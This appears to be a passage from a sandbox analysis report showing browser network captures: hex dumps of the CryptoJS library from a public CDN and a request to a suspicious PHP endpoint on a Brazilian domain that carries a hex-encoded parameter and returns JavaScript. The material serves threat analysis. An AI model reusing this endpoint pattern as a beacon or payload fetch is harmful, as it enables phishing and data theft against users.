                                                                Data Ascii: =0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)|
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35
                                                                Data Ascii: >>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((65
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c
                                                                Data Ascii: ,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296*l
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d
                                                                Data Ascii: x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e
                                                                Data Ascii: ll(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c>>
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69
                                                                Data Ascii: on(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549719104.17.24.144436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:18 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:18 UTC966INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:18 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb03e2d-bb78"
                                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 425779
                                                                Expires: Sun, 17 Aug 2025 18:11:18 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZefambRIffgs%2Bq3q52SoQ6JLvsa9vI8896BFWn5bKH%2BAMq1vx0vFx4rNZ%2FUfbezV%2BuH6ZDRMFz6sPvwKoyMvIqrzU%2BfZmFy6SVnEQoit%2BTlyDJfhFom5P4m1600c98qJj7gyN%2BW4"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e05f71b2419b6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:18 UTC403INData Raw: 37 62 65 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                Data Ascii: 7be3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d
                                                                Data Ascii: pto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"=
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 28 76 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e
                                                                Data Ascii: (var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clon
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f
                                                                Data Ascii: .parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 3d 30 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b
                                                                Data Ascii: =0,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 36 33 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26
                                                                Data Ascii: 63092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d
                                                                Data Ascii: )]>>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 37 5d 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c
                                                                Data Ascii: 7]),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 74 3d 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74
                                                                Data Ascii: t=i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;ret
                                                                2024-08-27 18:11:18 UTC1369INData Raw: 65 72 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77
                                                                Data Ascii: er(o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.54971845.164.92.1884436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:18 UTC545OUTGET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:18 UTC182INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:17 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/javascript
